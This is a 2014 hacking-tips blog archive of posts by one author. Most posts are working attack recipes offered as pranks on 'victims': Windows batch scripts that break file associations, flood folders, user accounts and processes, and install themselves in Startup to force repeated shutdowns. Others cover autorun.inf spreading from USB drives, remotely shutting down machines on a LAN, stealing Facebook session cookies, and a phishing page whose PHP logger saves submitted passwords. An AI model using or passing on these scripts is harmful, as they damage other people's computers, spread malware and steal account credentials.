Skip to main content

Posts

Showing posts from November, 2014

HOW TO CHANGE YOUR IP ADDRESS ( IP MASKING )

What is Ip Masking? IP masking is hiding your Original(Dynamic/Static) IP address so that you can not be traced.  IP masking is using Fake IP address for your machine. For Example, Let us assume your ip address is 173.23.22.212 and your location is xxxx. Using IP masking, you can make your IP address is 202.102.12.123(fake IP Address) and your location becomes yyyy. Using Proxy IP Address , you can hide your IP. HIDE YOUR IP : There are various tools Available on internet for hiding IP but i m using SurfEasy bcz it's very easy to use. SurfEasy's Free VPN lets you: Easily control how much you reveal about what you do online – simply turn SurfEasy on and we take care of the rest Encrypt all Internet data in and out of your smartphone, tablet and computer with the same technology trusted by banks and governments Shield your IP address and location to browse anonymously and avoid being tracked Appear to be in a different country to get access t

HACK FACEBOOK BY STEALING COOKIES

This method works only when the victims computer is in a LAN (local area network ).Best place to try out this is in schools ,collages ,cafes . where computers are connected in LAN .Before i proceed let me first explain "cookies " What Are Cookies ? And What Is The Use Of Stealing Cookies ? Cookies are small files that stored on users computer by websites when a user visits them. The stored Cookies are used by the web server to identify and authenticate  the user .For example when a user logins in Facebook a unique string is generated and one copy of it  is saved on the server and other is saved on the users browser as Cookies. Both are matched every time the user does any thing in his account So if we steal the victims cookie and inject them  in our browser we will be able to imitate the victims identity to the web server and thus we will be able to login is his account . This is called as Side jacking .The best thing about this is that  we need not no

Make an Extension Changer virus

By:Prayag Nao     It is an Extension Changer in which,Every extension is associated with a filetype like extension ‘exe’ is  is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.    Below code changes the association of some extensions to filetype ‘anything' which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files would not open properly.   Warning : Don;t try this on your own pc. @echo off assoc .txt=anything // this command associates extension .txt with filetype anything. assoc .exe=anything assoc .jpeg=anything assoc .png=anything assoc .mpeg=anything   open notepad n paste this code and save with anything. bat (must use Bat extension)    Enjoy.......!!!

Make a Application Bomber virus

By: Prayag Nao       This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.  You can add anysoftware name which you wanna to open. It's very funny virus,you can use it for fun on your friends pc. Enjoy.......!!!! @echo off          // It instructs to hide the commands when batch files is executed :x                       //loop variable start winword  start mspaint     //open paint start notepad start write start cmd          //open command prompt start explorer start control start calc         // open calculator goto x             // infinite loop

Folder flooder virus

By: prayag nao Hello friends this virus makes unlimited folders in your pc. @echo off :x md %random%   // makes directory/folder.  goto x   just copy n paste code in notepad and save with   bat extension. you are done.   Here %random% is a variable that would generate a positive no. randomly.  So this code would make start creating folders whose name can be any random number.  Enjoy................!!!  

User account flooder virus

By:prayag nao Hello my friends User account flooder virus make multiple account in pc. it an fun virus usually used for irritating victim. This code would start creating windows user accounts whose names could be any random numbers.  @echo off :x net user %random% /add     //create user account goto x   copy n paste these code into notepad and save with bat extension. Enjoy...!!!!

Shutdown Virus

By: prayag nao friends it is very dangerous virus so carefully use this virus. copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”   copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”        //these two commands will copy the batchfile in start up folders (in XP)   shutdown -s -t 00      //this will shutdown the computer in 0 seconds  Note : Files in Start up folder gets started automatically when windows starts .  You should  first two lines of  code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately.    You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder. 

Fork Bomb

By:prayag nao This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .  %0|%0   //Its percentage zero pipe percentage zero Enjoy......!!!

Spreading batch viruses through pen drive

By: prayag nao       Step 1.  Open notepad and write  [autorun] open=anything.bat Icon=anything.ico Save file as ‘autorun.inf’ Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive . When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.   Enjoy.............!!!

How to Remotely Shutdown Other's Computers

By: prayag nao Things you need before you start: -You NEED a computer -You NEED a friend’s computer - A LAN(Local Area Network). This only works if both computers are on the SAME network (i.e. computer labs at college or in wifi)   Step 1: First off all, you will need to find the computer name of your targeted computer. Step 2: Now go back to your computer. Click ‘start,’ then click ‘run’. After the ‘run’ screen opens it should look like this now type cmd in run,this will open command prompt. Now type shutdown/i  command prompt,now this new window will open...... Now click on add and give the name of victim's pc,you can give delay for shutdown. In comment box you can write any thing ( i.e.  Your pc is hacked......) for fear victim. Enjoy....!!!!!!!

How to know if the web server is Windows or Linux based...................!!!!

by: prayag nao Its very easy to take on a system if you know the operating system of the server. Well this is something learn’t from practical experience. follow given steps:- 1) open run and type cmd and click ok. 2) Now type ping www.anywebsitename.com in command  prompt. in my case i typed www.yahoo.com . 3) We Are interested in seeing the TTL time which you can see at the end of each request in ping. NOTE:- 1) If TTL <64 then the server is Linux based 2) If TTL>64 but <128 then the server is Windows bsaed 3) TTL>128 Mac and others. From the above screenshot, it is clear that the servers of yahoo is linux based. Enjoy........!!!

Invite all Facebook friends for page like at 1 click

by: prayag nao Invite all fb frnds on page in one click is everyone's need,so today i m sharing a working script or code for invite all fb friends. Invite all friends in google chrome browser: First login to ur fb account. Now go to a page on which you want it invite all friends Now click on see all friends on that page.  Now just scroll down for all friends untill ur friends end. Now press ctrl+shift+J. Now click on console button. Now copy and paste given code into console. javascript:var inputs = document.getElementsByClassName('uiButton _1sm'); for(var i=0; i<inputs.length;i++) { inputs[i].click(); } Than wait for a few second then you will see ....... That's it you have done. Invite all fb friends in firefox browser: I f you are using Firefox than follow same method. only difference is just open console box using console+shift+K. now paste upper script on console box wait for

Confirm all Facebook requests by just one click

  By: prayag nao Hello Friends!! Now I am here with this trick: How to confirm all friend request by just one click in google chorme ............???? First of all login to your fb account Now go to given link.... https://www.facebook.com/reqs.php         now press ctrl+D then click on edit and assign values as below      Name:xyz(any name)   URL:   javascript: var field = document.getElementsByName("actions[accept]") ;for (i = 0; i < field.length; i++)field[i].click() ;       now click on that bookmarks you have created,that's it you have accepted all fb  request.     Don't forget to like...    

Browse Forums without Login or register

by: prayag  nao If you are irritate by loging into forums just for view a single page,then this trick only for you. How it's work: Forums often block unregistered or unauthenticated users from viewing their page, they may not block Google bots.  We can take advantage of this  and fool the forum into believe that  we are Google bots.  So what we are going to do it's very easy  Firstly Download and install "user agent addon" for Mozilla firefox from here: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/    Now You just have to select "Tools" option from the menu bar  and select " Default User Agent ". Now select "Edit user Agents" . now you will see this window.. Now select "New" . Now copy and paste these code   Description :           crawl-66-249-66-1.googlebot.com  User Agent:            Googlebot/2.1 (+ http://www.googlebot.com/bot.ht

How to hack facebook by phishing method

By: prayag nao Hello friends in this post i am going to tell you How to hack Facebook by phishing method. step-1: 1) Firstly open  Facebook login page 2) Now right cilck anywhere on page and select VIEW PAGE SOURCE 3) Now you will see HTML code of Facebook copy and paste code into notepad, now press ctrl+f and type action= you will find out action =" https://www.facebook.com/login.php?login_attempt=1 "     4) Now change   action =" https://www.facebook.com/login.php?login_attempt=1 "   with action="id.php"             5)Now save notepad file with name facebook.htm , now copy and paste give code into notepad   <?php header ('Location:http://www.facebook.com/'); $handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) {    fwrite($handle, $variable);    fwrite($handle, "=");    fwrite($handle, $value);    fwrite($ha

How to increase RAM of computer by pendrive

By: prayag nao hello friends today i am going to tell you how to increase RAM by pen-drive,it's too easy just follow given steps. Go to my computer and right click on pen-drive. now Click on ready boost.   3. Now check use this device and allocate memory you want and click ok. 4. Now restart your computer and enjoy your increased speed. ENJOY!!!!!!!!!!!!!!

RUN commands

 By: prayag nao   START >> RUN Accessibility Controls access.cpl Add Hardware Wizard hdwwiz.cpl Add/Remove Programs appwiz.cpl Administrative Tools control.exe admintools Automatic Updates wuaucpl.cpl Bluetooth Transfer Wizard fsquirt Calculator calc Certificate Manager certmgr.msc Character Map charmap Check Disk Utility chkdsk Clipboard Viewer clipbrd Command Prompt cmd Component Services dcomcnfg Computer Management compmgmt.msc Date and Time Properties timedate.cpl DDE Shares ddeshare Device Manager devmgmt.msc Direct X Control Panel (if installed) directx.cpl Direct X Troubleshooter dxdiag Disk Cleanup Utility cleanmgr Disk Defragment dfrg.msc Disk Management diskmgmt.msc Disk Partition Manager diskpart Display Properties control.exe desktop Display Properties desk.cpl Display Properties (w/Appearance Tab Preselected) control.ex